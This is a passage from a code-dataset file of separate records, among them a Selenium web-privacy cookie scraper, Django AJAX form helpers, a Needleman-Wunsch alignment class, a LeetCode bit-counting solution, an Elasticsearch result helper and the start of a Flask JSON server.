notWorkingLog:\n notWorkingLog.write(currentURL + \"\\n\")\n continue\n else:\n with open(\"../result/result.csv\", \"a\") as resultLine:\n browser.find_element_by_name(\"url\").send_keys(currentURL + Keys.ENTER)\n try:\n WebDriverWait(browser, 60) \\\n .until(EC.presence_of_all_elements_located((By.CLASS_NAME, \"light\")))\n except selenium.common.exceptions.TimeoutException as e:\n try:\n browser.find_element_by_xpath(\"//a[contains(text(),'Try again?')]\")\n WebDriverWait(browser, 60) \\\n .until(EC.presence_of_all_elements_located((By.CLASS_NAME, \"light\")))\n except Exception as e:\n with open(\"../result/error.log\", \"a\") as errorLog:\n print(\"Something went wrong\")\n errorLog.write(currentURL + '\\n')\n continue\n\n firstPartyCookieList = []\n thirdpartyCookieList = []\n thirdpartyRequestsList = []\n\n with open(f\"../result/{resultFilename.resultFileName(currentURL)}.csv\",\n \"w\") as currentResult:\n currentResult.write(\"Domain, Name, Expires on \\n\")\n data = browser.find_elements_by_class_name(\"cookies\")\n\n try:\n cookiesNumbers = browser.find_elements_by_css_selector('#cookies + p > strong')\n except selenium.common.exceptions.NoSuchElementException as e:\n cookiesNumbers = []\n print(e)\n\n try:\n firstPartyCookieNumber = cookiesNumbers[0].text\n except IndexError as e:\n firstPartyCookieNumber = 0\n\n try:\n thirdpartyCookieNumber = cookiesNumbers[1].text\n except IndexError as e:\n thirdpartyCookieNumber = 0\n\n try:\n requestsNumber = browser.find_elements_by_css_selector(\"#requests+ p > strong\")\n except selenium.common.exceptions.NoSuchElementException as e:\n requestsNumber = []\n print(e)\n\n try:\n thirdpartyRequestsNumber = requestsNumber[0].text\n except IndexError as e:\n thirdpartyRequestsNumber = 0\n\n try:\n if data[0]:\n currentResult.write(f\"\\n ======== First-party cookies \"\n f\"({firstPartyCookieNumber}) \"\n f\"========\\n\")\n for cookie in data[0].find_elements_by_tag_name(\"tr\")[1:]:\n cookieData = cookie.find_elements_by_tag_name(\"td\")\n currentResult.write(f\"{cookieData[0].text}; \"\n f\"{cookieData[1].text}; \"\n f\"{cookieData[3].text} \\n\")\n\n if cookieData[0].text not in firstPartyCookieList:\n firstPartyCookieList.append(cookieData[0].text)\n except IndexError as e:\n currentResult.write(f\"\\n ======== First-party cookies \"\n f\"({firstPartyCookieNumber}) \"\n f\"========\\n\")\n print(\"No First-party cookie\")\n\n try:\n if data[1]:\n currentResult.write(f\"\\n ======== Third-party cookies \"\n f\"({thirdpartyCookieNumber}) \"\n f\"========\\n\")\n for cookie in data[1].find_elements_by_tag_name(\"tr\")[1:]:\n cookieData = cookie.find_elements_by_tag_name(\"td\")\n currentResult.write(f\"{cookieData[0].text}; \"\n f\"{cookieData[1].text}; \"\n f\"{cookieData[3].text} \\n\")\n\n if cookieData[0].text not in thirdpartyCookieList:\n thirdpartyCookieList.append(cookieData[0].text)\n except IndexError as e:\n currentResult.write(f\"\\n ======== Third-party cookies \"\n f\"({thirdpartyCookieNumber}) \"\n f\"========\\n\")\n print(\"No third-party cookie\")\n\n try:\n requestData = browser.find_element_by_class_name(\"requests\")\n if requestData:\n currentResult.write(f\"\\n ======== Third-party requests \"\n f\" ({thirdpartyRequestsNumber}) \"\n f\"========\\n\"\n f\"Host; Classification \\n\")\n for request in requestData.find_elements_by_tag_name(\"tr\")[1:]:\n requestField = request.find_elements_by_tag_name(\"td\")\n currentResult.write(f\"{requestField[0].text}; \"\n f\"{requestField[1].text} \\n\")\n\n thirdpartyRequestsList.append(requestField[0].text)\n except selenium.common.exceptions.NoSuchElementException as e:\n print(\"No third-party requests\")\n\n resultLine.write(f\"{currentURL}; \"\n f\"{firstPartyCookieNumber}; \"\n f\"{firstPartyCookieList}; \"\n f\"{thirdpartyCookieNumber}; \"\n f\"{thirdpartyCookieList}; \"\n f\"{thirdpartyRequestsNumber}; \"\n f\"{thirdpartyRequestsList} \\n\"\n )\n print(\"Finished\")\n previousUrl.append(currentURL)\n\nbrowser.quit()\n","sub_path":"src/useWebPrivacyCheck.py","file_name":"useWebPrivacyCheck.py","file_ext":"py","file_size_in_byte":9507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"128414987","text":"from django.utils import six\r\nfrom django.forms.models import ModelFormMetaclass, inlineformset_factory,\\\r\n BaseModelForm, BaseInlineFormSet, ModelForm, ModelChoiceField,\\\r\n InlineForeignKeyField\r\nfrom django.forms.utils import ErrorList, ErrorDict\r\nfrom django.utils.html import conditional_escape\r\nfrom django.utils.encoding import force_text\r\nfrom django.utils.safestring import mark_safe\r\nfrom collections import OrderedDict\r\nimport copy\r\nfrom django.forms.forms import Form\r\nfrom django.forms.formsets import ORDERING_FIELD_NAME, DELETION_FIELD_NAME\r\nfrom django.forms.fields import IntegerField, BooleanField\r\nfrom django.utils.translation import ugettext as _\r\nfrom django.forms.widgets import HiddenInput\r\nfrom django.utils.text import capfirst\r\n\r\n\r\nclass AjaxFormMixin():\r\n \"\"\"Form rendering useful for ajax \"\"\"\r\n def _ajax_html_output(self, normal_row, error_row, row_ender, help_text_html, errors_on_separate_row):\r\n \"Helper function for outputting HTML. Used by as_table(), as_ul(), as_p().\"\r\n top_errors = self.non_field_errors() # Errors that should be displayed above all fields.\r\n output, hidden_fields = [], []\r\n\r\n for name, field in self.fields.items():\r\n html_class_attr = ''\r\n bf = self[name]\r\n \r\n widget_attrs = bf.field.widget.attrs\r\n if not \"class\" in widget_attrs: \r\n widget_attrs[\"class\"] = \"\"\r\n \r\n widget_attrs[\"class\"] += \" form-control\"\r\n \r\n # Escape and cache in local variable.\r\n bf_errors = self.error_class([conditional_escape(error) for error in bf.errors])\r\n if bf.is_hidden:\r\n if bf_errors:\r\n top_errors.extend(\r\n [_('(Hidden field %(name)s) %(error)s') % {'name': name, 'error': force_text(e)}\r\n for e in bf_errors])\r\n hidden_fields.append(six.text_type(bf))\r\n else:\r\n # Create a 'class=\"...\"' attribute if the row should have any\r\n # CSS classes applied.\r\n css_classes = bf.css_classes()\r\n if css_classes:\r\n html_class_attr = ' class=\"%s\"' % css_classes\r\n\r\n if bf.label:\r\n label = conditional_escape(force_text(bf.label))\r\n label = bf.label_tag(label) or ''\r\n else:\r\n label = ''\r\n\r\n if field.help_text:\r\n help_text = help_text_html % force_text(field.help_text)\r\n else:\r\n help_text = ''\r\n \r\n output.append(normal_row % {\r\n 'label': force_text(label),\r\n 'field': six.text_type(bf),\r\n 'help_text': help_text,\r\n 'html_class_attr': html_class_attr,\r\n 'field_name': bf.html_name\r\n })\r\n \r\n #Errors\r\n err_id = 'id=\"errid_%s\"' % bf.html_name\r\n err_class = \"error\"\r\n output.append(error_row % {\r\n \"err\": force_text(bf_errors), \r\n \"err_id\": err_id,\r\n \"err_class\": err_class\r\n })\r\n\r\n #if top_errors:\r\n err_class = \"top-error error\"\r\n output.insert(0, error_row % {\r\n \"err\": force_text(bf_errors), \r\n \"err_class\": err_class,\r\n \"err_id\": \"\"\r\n })\r\n\r\n if hidden_fields: # Insert any hidden fields in the last row.\r\n str_hidden = ''.join(hidden_fields)\r\n if output:\r\n last_row = output[-1]\r\n # Chop off the trailing row_ender (e.g. '') and\r\n # insert the hidden fields.\r\n if not last_row.endswith(row_ender):\r\n # This can happen in the as_p() case (and possibly others\r\n # that users write): if there are only top errors, we may\r\n # not be able to conscript the last row for our purposes,\r\n # so insert a new, empty row.\r\n last_row = (normal_row % {'errors': '', 'label': '',\r\n 'field': '', 'help_text': '',\r\n 'html_class_attr': html_class_attr})\r\n output.append(last_row)\r\n output[-1] = last_row[:-len(row_ender)] + str_hidden + row_ender\r\n else:\r\n # If there aren't any rows in the output, just append the\r\n # hidden fields.\r\n output.append(str_hidden)\r\n return mark_safe('\\n'.join(output))\r\n \r\n def ajax_as_table(self):\r\n \"Returns this form rendered as HTML s -- excluding the
    .\"\r\n return self._ajax_html_output(\r\n normal_row='%(label)s%(field)',\r\n error_row='%s',\r\n row_ender='',\r\n help_text_html='%s',\r\n errors_on_separate_row=True)\r\n\r\n def ajax_as_ul(self):\r\n \"Returns this form rendered as HTML
  • s -- excluding the
      .\"\r\n return self._ajax_html_output(\r\n normal_row='
    • %(label)s %(field)s
    • ',\r\n error_row='
    • %s
    • ',\r\n row_ender='',\r\n help_text_html='%s',\r\n errors_on_separate_row=True)\r\n \r\n def ajax_as_p(self):\r\n \"Returns this form rendered as HTML

      s.\"\r\n return self._ajax_html_output(\r\n normal_row='

      %(label)s %(field)s

      ',\r\n error_row='

      %(err)s

      ',\r\n row_ender='

      ',\r\n help_text_html='%s',\r\n errors_on_separate_row=True)\r\n \r\n\r\n \r\nclass AjaxForm(Form, AjaxFormMixin):\r\n pass\r\n\r\n\r\n\r\nclass AjaxModelForm(ModelForm, AjaxFormMixin):\r\n pass\r\n\r\n\r\n\r\nclass ExtendedFormSet(BaseInlineFormSet):\r\n \r\n template_form = ('
      '\r\n '
      %(title)s
      %(form)s
      '\r\n '
      ')\r\n template_formset = ('
      '\r\n '
      %(title)s
      '\r\n '%(forms)s'\r\n ''\r\n '
      ')\r\n \r\n def _ajax_html_output(self, normal_row, error_row, row_ender, help_text_html,\r\n errors_on_separate_row, line_start, line_el, line_end, \r\n tform=template_form, tformset=template_formset):\r\n \r\n vname_plural = self.form._meta.model._meta.verbose_name_plural.capitalize()\r\n vname = self.form._meta.model._meta.verbose_name.capitalize()\r\n \r\n output = [six.text_type(self.management_form),]\r\n for form in self:\r\n if isinstance(form, ExtendedForm):\r\n ho = form._ajax_html_output(normal_row, error_row, row_ender, help_text_html, \r\n errors_on_separate_row, line_start, line_el, line_end)\r\n else:\r\n ho = form._ajax_html_output(normal_row, error_row, row_ender, help_text_html, \r\n errors_on_separate_row)\r\n \r\n output.append(tform % {\"form\": ho, \"title\": vname })\r\n \r\n forms = ' '.join(output)\r\n \r\n forms = tformset % {\"forms\": forms, \"title\": vname_plural, \"prefix\": self.prefix}\r\n \r\n return mark_safe(forms)\r\n \r\n def ajax_empty_form_as_p(self):\r\n vname = self.form._meta.model._meta.verbose_name.capitalize()\r\n return self.template_form % {\"form\": self.empty_form.ajax_as_p(), \"title\": vname }\r\n \r\n def add_fields(self, form, index):\r\n \"\"\"A hook for adding extra fields on to each form instance.\"\"\"\r\n \r\n ###Add a hidden field for the object's primary key.\r\n from django.db.models import AutoField, OneToOneField, ForeignKey\r\n self._pk_field = pk = self.model._meta.pk\r\n # If a pk isn't editable, then it won't be on the form, so we need to\r\n # add it here so we can tell which object is which when we get the\r\n # data back. Generally, pk.editable should be false, but for some\r\n # reason, auto_created pk fields and AutoField's editable attribute is\r\n # True, so check for that as well.\r\n\r\n def pk_is_not_editable(pk):\r\n return ((not pk.editable) or (pk.auto_created or isinstance(pk, AutoField))\r\n or (pk.rel and pk.rel.parent_link and pk_is_not_editable(pk.rel.to._meta.pk)))\r\n if pk_is_not_editable(pk) or pk.name not in form.fields:\r\n if form.is_bound:\r\n pk_value = form.instance.pk\r\n else:\r\n try:\r\n if index is not None:\r\n pk_value = self.get_queryset()[index].pk\r\n else:\r\n pk_value = None\r\n except IndexError:\r\n pk_value = None\r\n if isinstance(pk, OneToOneField) or isinstance(pk, ForeignKey):\r\n qs = pk.rel.to._default_manager.get_queryset()\r\n else:\r\n qs = self.model._default_manager.get_queryset()\r\n qs = qs.using(form.instance._state.db)\r\n if form._meta.widgets:\r\n widget = form._meta.widgets.get(self._pk_field.name, HiddenInput)\r\n else:\r\n widget = HiddenInput\r\n form.fields[self._pk_field.name] = ModelChoiceField(qs, initial=pk_value, required=False, widget=widget)\r\n if isinstance(form, ExtendedForm):\r\n form.rfields[''].append(self._pk_field.name)\r\n \r\n #BaseFormSet \r\n if self.can_order:\r\n # Only pre-fill the ordering field for initial forms.\r\n if index is not None and index < self.initial_form_count():\r\n form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), initial=index + 1, required=False)\r\n if isinstance(form, ExtendedForm):\r\n form.rfields[''].append(ORDERING_FIELD_NAME)\r\n else:\r\n form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), required=False)\r\n if isinstance(form, ExtendedForm):\r\n form.rfields[''].append(ORDERING_FIELD_NAME)\r\n if self.can_delete:\r\n form.fields[DELETION_FIELD_NAME] = BooleanField(label=_('Delete'), required=False)\r\n if isinstance(form, ExtendedForm):\r\n form.rfields[''].append(DELETION_FIELD_NAME)\r\n \r\n #InlineFormSet \r\n if self._pk_field == self.fk:\r\n name = self._pk_field.name\r\n kwargs = {'pk_field': True}\r\n else:\r\n # The foreign key field might not be on the form, so we poke at the\r\n # Model field to get the label, since we need that for error messages.\r\n name = self.fk.name\r\n kwargs = {\r\n 'label': getattr(form.fields.get(name), 'label', capfirst(self.fk.verbose_name))\r\n }\r\n if self.fk.rel.field_name != self.fk.rel.to._meta.pk.name:\r\n kwargs['to_field'] = self.fk.rel.field_name\r\n\r\n form.fields[name] = InlineForeignKeyField(self.instance, **kwargs)\r\n\r\n # Add the generated field to form._meta.fields if it's defined to make\r\n # sure validation isn't skipped on that field.\r\n if form._meta.fields:\r\n if isinstance(form._meta.fields, tuple):\r\n form._meta.fields = list(form._meta.fields)\r\n form._meta.fields.append(self.fk.name)\r\n #if isinstance(form, ExtendedForm):\r\n #form.rfields[''].append(self.fk.name)\r\n\r\n\r\n\r\nclass ExtendedFormMetaclass(ModelFormMetaclass):\r\n\r\n def __new__(cls, name, bases, attrs):\r\n \r\n opts = attrs.get('Meta', None)\r\n inlines = getattr(opts, 'inlines', {})\r\n rfields = getattr(opts, 'fields', {})\r\n lines = getattr(opts, \"lines\", None)\r\n inline_fields = []\r\n \r\n if rfields == \"__all__\" or rfields == {}:\r\n new_class = super().__new__(cls, name, bases, attrs)\r\n rfields = OrderedDict({\"\": list(new_class.base_fields.keys())})\r\n else:\r\n if isinstance(rfields[0], tuple):\r\n rfields = OrderedDict(rfields)\r\n else:\r\n rfields = OrderedDict({\"\": rfields})\r\n \r\n opts.fields = []\r\n for i in rfields.values():\r\n if isinstance(i, str):\r\n i = [i,]\r\n for j in i:\r\n if j in inlines:\r\n inline_fields.append(j)\r\n else:\r\n opts.fields.append(j)\r\n \r\n new_class = super().__new__(cls, name, bases, attrs)\r\n \r\n for k, v in rfields.items():\r\n new_fields = []\r\n for i in range(0, len(v)): \r\n if v[i] in inline_fields or v[i] in new_class.base_fields:\r\n new_fields.append(v[i])\r\n rfields[k] = new_fields\r\n \r\n opts = new_class._meta\r\n \r\n if opts.model:\r\n opts.inlines = {}\r\n for k, v in inlines.items():\r\n v.update({'parent_model': opts.model, 'formset': ExtendedFormSet})\r\n opts.inlines[k] = inlineformset_factory(**v)\r\n \r\n opts.inline_fields = inline_fields\r\n opts.rfields = rfields\r\n \r\n if lines:\r\n for f, t in lines:\r\n fi = ti = None\r\n for n in rfields.values():\r\n try: \r\n fi = n.index(f)\r\n except ValueError:\r\n continue\r\n else:\r\n try:\r\n ti = n[fi + 1:].index(t)\r\n for i in n[fi + 1: ti - 1]:\r\n if i in inline_fields:\r\n raise ValueError()\r\n except ValueError:\r\n raise ValueError(\"Invalid line range! %s - %s\" %(f, t)) #TODO(more informative)\r\n if fi == None:\r\n raise ValueError(\"Invalid line range! %s - %s\" %(f, t))\r\n \r\n opts.lines_from = tuple(map(lambda x: x[0], lines))\r\n opts.lines_to = tuple(map(lambda x: x[1], lines))\r\n else:\r\n opts.lines_from = []\r\n opts.lines_to = []\r\n \r\n return new_class\r\n\r\n\r\n\r\nclass BaseExtendedForm(BaseModelForm):\r\n \r\n def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,\r\n initial=None, error_class=ErrorList, label_suffix=None,\r\n empty_permitted=False, instance=None):\r\n super().__init__(data, files, auto_id, prefix, initial, \r\n error_class, label_suffix, empty_permitted, instance)\r\n \r\n self.inlines = {}\r\n for name, iform in self._meta.inlines.items():\r\n self.inlines[name] = iform(data, files, self.instance, prefix=name)\r\n self.rfields = copy.deepcopy(self._meta.rfields)\r\n \r\n def full_clean(self):\r\n \"\"\"\r\n Cleans all of self.data and populates self._errors and\r\n self.cleaned_data.\r\n \"\"\"\r\n self._errors = ErrorDict()\r\n if not self.is_bound: # Stop further processing.\r\n return\r\n self.cleaned_data = {}\r\n # If the form is permitted to be empty, and none of the form data has\r\n # changed from the initial data, short circuit any validation.\r\n if self.empty_permitted and not self.has_changed():\r\n self._clean_inlines() #TODO think\r\n return\r\n\r\n self._clean_fields()\r\n self._clean_form()\r\n self._post_clean()\r\n self._clean_inlines()\r\n \r\n def _clean_inlines(self):\r\n \r\n self._inline_errors = {}\r\n for name, iform in self.inlines.items():\r\n iform.full_clean()\r\n self._inline_errors[name] = iform._errors\r\n \r\n @property\r\n def all_errors(self):\r\n \"Returns an ErrorDict for the data provided for the form\"\r\n if self._errors is None:\r\n self.full_clean()\r\n return { \"form_errors\": self._errors, \"inline_errors\": self._inline_errors }\r\n \r\n def is_valid(self):\r\n valid = super().is_valid()\r\n for iform in self.inlines.values():\r\n valid = valid and iform.is_valid()\r\n \r\n return valid\r\n \r\n \r\n def save_inlines(self, commit=True):\r\n \r\n inlines = []\r\n for iform in self.inlines.values():\r\n inlines.append(iform.save(commit))\r\n \r\n return inlines\r\n \r\n \r\n \r\n def _ajax_html_output(self, normal_row, error_row, row_ender, help_text_html, \r\n errors_on_separate_row, line_start=None, line_el=None, line_end=None):\r\n \"Helper function for outputting HTML. Used by as_table(), as_ul(), as_p().\"\r\n top_errors = self.non_field_errors() # Errors that should be displayed above all fields.\r\n output = []\r\n \r\n rf = self.rfields\r\n for title, fields in rf.items():\r\n need_fieldset = not(len(rf)==1 and title==\"\")\r\n \r\n if need_fieldset:\r\n if title:\r\n title = \"

      %s

      \" % title\r\n output.append('
      %s' % title)\r\n \r\n line = []\r\n line_err = []\r\n for name in fields:\r\n if name in self._meta.inline_fields:\r\n output.append(\r\n self.inlines[name]._ajax_html_output(normal_row, error_row, row_ender, \r\n help_text_html, errors_on_separate_row,\r\n line_start, line_el, line_end)\r\n )\r\n else:\r\n \r\n field = self.fields[name]\r\n html_class_attr = ''\r\n bf = self[name]\r\n \r\n \r\n widget_attrs = bf.field.widget.attrs\r\n if not \"class\" in widget_attrs: \r\n widget_attrs[\"class\"] = \"\"\r\n \r\n widget_attrs[\"class\"] += \" form-control\"\r\n \r\n # Escape and cache in local variable.\r\n bf_errors = self.error_class([conditional_escape(error) for error in bf.errors])\r\n \r\n # Create a 'class=\"...\"' attribute if the row should have any\r\n # CSS classes applied.\r\n css_classes = bf.css_classes()\r\n if css_classes:\r\n html_class_attr = '%s' % css_classes\r\n \r\n if bf.label and not bf.is_hidden:\r\n label = conditional_escape(force_text(bf.label))\r\n label = bf.label_tag(label) or ''\r\n else:\r\n label = ''\r\n \r\n if field.help_text:\r\n help_text = help_text_html % force_text(field.help_text)\r\n else:\r\n help_text = ''\r\n \r\n opts = self._meta\r\n ctx = {\r\n 'label': force_text(label),\r\n 'field': six.text_type(bf),\r\n 'help_text': help_text,\r\n 'html_class_attr': html_class_attr,\r\n 'field_name': bf.html_name\r\n }\r\n \r\n #Errors\r\n err_id = 'id=\"errid_%s\"' % bf.html_name\r\n err_class = \"error\"\r\n line_err.append(error_row % {\r\n \"err\": force_text(bf_errors), \r\n \"err_id\": err_id,\r\n \"err_class\": err_class\r\n })\r\n \r\n if name in opts.lines_from:\r\n line.append((line_start + line_el) % ctx)\r\n elif name in opts.lines_to:\r\n line.append((line_el + line_end) % ctx)\r\n output.append(''.join(line))\r\n line.clear()\r\n output.append(''.join(line_err))\r\n line_err.clear()\r\n elif len(line) > 0:\r\n line.append(line_el % ctx)\r\n else:\r\n output.append(normal_row % ctx)\r\n output.append(''.join(line_err))\r\n line_err.clear()\r\n \r\n if need_fieldset:\r\n output.append('
      ')\r\n \r\n #if top_errors:\r\n err_class = \"top-error error\"\r\n output.insert(0, error_row % {\r\n \"err\": force_text(bf_errors), \r\n \"err_class\": err_class,\r\n \"err_id\": \"\"\r\n })\r\n\r\n return mark_safe('\\n'.join(output))\r\n \r\n def ajax_as_table(self):\r\n \"Returns this form rendered as HTML s -- excluding the
      .\"\r\n return self._ajax_html_output(\r\n normal_row='%(label)s%(field)',\r\n error_row='%s',\r\n row_ender='',\r\n help_text_html='%s',\r\n errors_on_separate_row=True)\r\n\r\n def ajax_as_ul(self):\r\n \"Returns this form rendered as HTML
    • s -- excluding the
        .\"\r\n return self._ajax_html_output(\r\n normal_row='
      • %(label)s %(field)s
      • ',\r\n error_row='
      • %s
      • ',\r\n row_ender='',\r\n help_text_html='%s',\r\n errors_on_separate_row=True,\r\n line_start='
      • ', #TODO (autodetection)\r\n line_el='%(label)s %(field)s',\r\n line_end='
      • ')\r\n \r\n def ajax_as_p(self):\r\n \"Returns this form rendered as HTML

        s.\"\r\n return self._ajax_html_output(\r\n normal_row='

        %(label)s %(field)s

        ',\r\n error_row='

        %(err)s

        ',\r\n row_ender='

        ',\r\n help_text_html='%s',\r\n errors_on_separate_row=True,\r\n line_start='

        ', #TODO (autodetection)\r\n line_el='%(label)s %(field)s',\r\n line_end='

        ')\r\n \r\n def add_field(self, name, field, group=\"\"):\r\n self.fields[name] = field\r\n self.rfields[group].update(name)\r\n \r\n\r\n\r\nclass ExtendedForm(six.with_metaclass(ExtendedFormMetaclass, BaseExtendedForm)):\r\n pass\r\n \r\n ","sub_path":"utils/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":23763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"55677729","text":"import os\nimport time\n\n# 项目路径\nPATH = os.path.join(os.getcwd(), 'Testapi')\n# 日志存放路径\nLOG_PATH = os.path.join(PATH, 'log')\n# 日志名默认为时期\nLOG_NAME = os.path.join(LOG_PATH, f'{time.strftime(\"%Y-%m-%d\", time.localtime())}.log')\n# 测试用例文档(格式需为.xls)\nFILES_NAME = 'APi.xls'\n# 接口文档存放路径\nFILES_PATH = os.path.join(PATH, 'files')\n# 测试文件\nFILES = os.path.join(FILES_PATH, FILES_NAME)\n# 测试报告路径\nSAVE_CASE = os.path.join(PATH, 'report')\n# 测试报告文件名(默认为时间)\nREPORT_NAME = time.strftime(\"%Y-%m-%d %H-%M-%S\", time.localtime())\n# 测试报告保存文件名\nREPORT_PATH = os.path.join(SAVE_CASE, f'{REPORT_NAME}' + '.html')\n# .xls报告路径\nREPORT_SAVE = os.path.join(SAVE_CASE, f'{time.strftime(\"%Y-%m-%d %H-%M-%S\", time.localtime())}.xls')\n# 操作第几张表\nTABLE = 0\n# 测试用例存放路径\nTESTCASE = os.path.join(PATH, 'testcase')\n# 接口响应时间\nRESPONSE_TIME = 2\n# 需要关注的响应参数\nRESPONSE_MESSAGE = {'code': 200}\n","sub_path":"Testapi/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"360497902","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Mike\n# @Contact : 597290963@qq.com\n# @Time : 2021/2/16 15:01\n# @File : CountBits.py\nfrom typing import List\n\n\"\"\"\n给定一个非负整数 num。对于 0 ≤ i ≤ num 范围中的每个数字 i ,计算其二进制数中的 1 的数目并将它们作为数组返回。\n\n示例 1:\n\n输入: 2\n输出: [0,1,1]\n示例 2:\n\n输入: 5\n输出: [0,1,1,2,1,2]\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/counting-bits\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\n\nclass Solution:\n\n def countBits(self, num: int) -> List[int]:\n dp = [0] * (num + 1)\n for i in range(1, num + 1):\n dp[i] = dp[i >> 1] + (i & 1)\n\n return dp\n\n\nif __name__ == '__main__':\n print(Solution().countBits(4))\n","sub_path":"datastructure/dp_exercise/CountBits.py","file_name":"CountBits.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"230536776","text":"from alignment import base\n\n\nclass NeedlemanWunsch(base.OptimalAlignment):\n \"\"\"Алгоритм Нидлмана-Вунша.\"\"\"\n\n def _add_gap_penalties(self, seq1, seq2):\n \"\"\"Заполнение первой строки и столбца.\"\"\"\n for i in range(1, len(seq1) + 1):\n self.nm_matrix[i][0] = self.nm_matrix[i - 1][0] \\\n + self.score[seq1[i - 1]][seq2[0]]\n\n for j in range(1, len(seq2) + 1):\n self.nm_matrix[0][j] = self.nm_matrix[0][j - 1] \\\n + self.score[seq1[0]][seq2[j - 1]]\n\n def _start_position(self):\n \"\"\"Алгоритм Нидлмана-Вунша начинается с последней клетки.\"\"\"\n i = len(self.seq1)\n j = len(self.seq2)\n return i, j\n\n def _best_score(self, diagscore, topscore, leftscore, i, j):\n self.nm_matrix[i][j] = max(diagscore, topscore, leftscore)\n\n def show_result(self):\n # Красивое совпадение символов\n alseq1 = self.alseq1\n alseq2 = self.alseq2\n max_lines = max(len(alseq1), len(alseq2))\n min_lines = min(len(alseq1), len(alseq2))\n allines = ''\n for i in range(max_lines):\n if i <= min_lines:\n if alseq1[i] == alseq2[i]:\n allines += '|'\n elif alseq1[i] != alseq2[i]:\n allines += ' '\n\n # Результат\n print(\"\\nРезультат глобального выравнивания:\\n\\n\")\n print(alseq1 + '\\n' + allines + '\\n' + alseq2 + '\\n')\n","sub_path":"1-autumn-2019/algo/homework/HW2/alignment/needwun.py","file_name":"needwun.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"589486151","text":"\n\ndef alter_range(interval_list):\n number_of_intervals = len(interval_list)\n\n new_interval = []\n counter = 1\n for i in range(number_of_intervals-1):\n if interval_list[i]['maxValue']== interval_list[i+1]['minValue']:\n counter = counter + 1\n new_interval = [{'minValue': interval_list[i]['minValue'], 'maxValue':interval_list[i+1]['maxValue'] , 'counter': counter}]\n\n\n \"\"\" If the intervals were non-consecutive intervals, then return original interval list. Otherwise return new list \n with just one interval\"\"\"\n if len(new_interval) ==0:\n return interval_list\n else:\n print(new_interval)\n return new_interval # doesn't contain a counter\n\n\n\n\nclass Backend_Helper:\n\n\n @staticmethod\n def clean_frontend_json(json_dict) :\n result = dict()\n for field in json_dict :\n field_value_name = field+\"Value\"\n field_range_name = field+\"Range\"\n if field_range_name in json_dict[field] :\n if len(json_dict[field][field_range_name]) > 0 : #json_dict ['price']['priceRange']\n \"\"\" If the user entered multiple intervals via checkbox, then process the interval to be one interval \n or multiple intervals if not consecutive intervals\"\"\"\n if len(json_dict[field].get(field_range_name))>1:\n json_dict[field][field_range_name] = alter_range(json_dict[field][field_range_name])\n result.update({field:json_dict[field]})\n elif field_value_name in json_dict[field] :\n if len(json_dict[field][field_value_name]) > 0 :\n result.update({field:json_dict[field]})\n elif \"intent\" in json_dict[field]:\n result.update({field:json_dict[field]})\n return result\n\n\n\n @staticmethod\n def clean_for_alexa(json_dict):\n #data[intent_variable].update({\"intent\":intent,\"value\":intent_variable_value})\n\n result = dict()\n intent = json_dict[\"intent\"]\n intent_variable = json_dict[\"intentVariable\"]\n intent_variable_value = json_dict[json_dict[\"intentVariable\"]][json_dict[\"intentVariable\"]+\"Value\"]\n for field_name in json_dict:\n field_value_name = field_name+\"Value\"\n if field_name == \"intentVariable\" or field_name == \"intent\":\n pass\n elif field_value_name in json_dict[field_name] :\n if Backend_Helper.is_integer(json_dict[field_name][field_value_name]):\n value = int(json_dict[field_name][field_value_name])\n elif Backend_Helper.is_float(json_dict[field_name][field_value_name]):\n value = float(json_dict[field_name][field_value_name])\n else :\n value = json_dict[field_name][field_value_name]\n\n result.update({field_name:{field_value_name : [value],\"weight\":4}})\n\n result.update({intent_variable:{\"intent\":intent,\"value\":intent_variable_value,\"weight\":6}})\n\n return result\n\n\n\n\n\n @staticmethod\n def refineResult(docs):\n outputProducts = []\n\n for hit in docs['hits']['hits']:\n\n item = dict()\n\n for field in hit[\"_source\"]:\n item.update({field:hit[\"_source\"][field]})\n\n outputProducts.append(item)\n\n return outputProducts\n\n @staticmethod\n def is_integer(var) :\n try:\n int(var)\n return True\n except ValueError:\n return False\n\n @staticmethod\n def is_float(var) :\n try:\n float(var)\n return True\n except ValueError:\n return False\n","sub_path":"backend/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"572277588","text":"from flask import Flask, jsonify\nfrom flask import request\nimport random\nimport logging\nimport os\n\nHOST = os.environ.get('HOST')\nPORT = os.environ.get('PORT')\n\n\nclass Server_Flask:\n def __init__(self, host, port, queue=None):\n self.host = host\n self.port = port\n self.queue = queue\n self.screen_buffer = {'request_count': 0, 'F_status_count': 0, 'clients': {}, 'max': 0, 'min': 255}\n\n self.logger = logging.getLogger(\"TestAutomat.Flask_Server\")\n\n log = logging.getLogger('werkzeug')\n log.disabled = True\n\n def run(self):\n app = Flask(__name__)\n\n @app.route(\"/\", methods=['GET', 'POST'])\n def index():\n self.screen_buffer['request_count'] += 1\n if request.method == 'GET':\n msg = {'error': {'code': 400, 'message': 'Only POST'}}\n return jsonify(msg)\n elif request.method == 'POST':\n ct = request.headers.get('Content-Type')\n if ct.find('application/json') != 0:\n print(ct.find('application/json'))\n msg = {'error': {'code': 400, 'message': 'Only json'}}\n return jsonify(msg)\n else:\n msg = {'error': {'code': 405, 'message': 'Method Not Allowed'}}\n return jsonify(msg)\n\n data = request.get_json(silent=True)\n if data is None:\n msg = {'error': {'code': 400, 'message': 'Bad json'}}\n return jsonify(msg)\n\n if 'x' not in data or 'status' not in data or 'id' not in 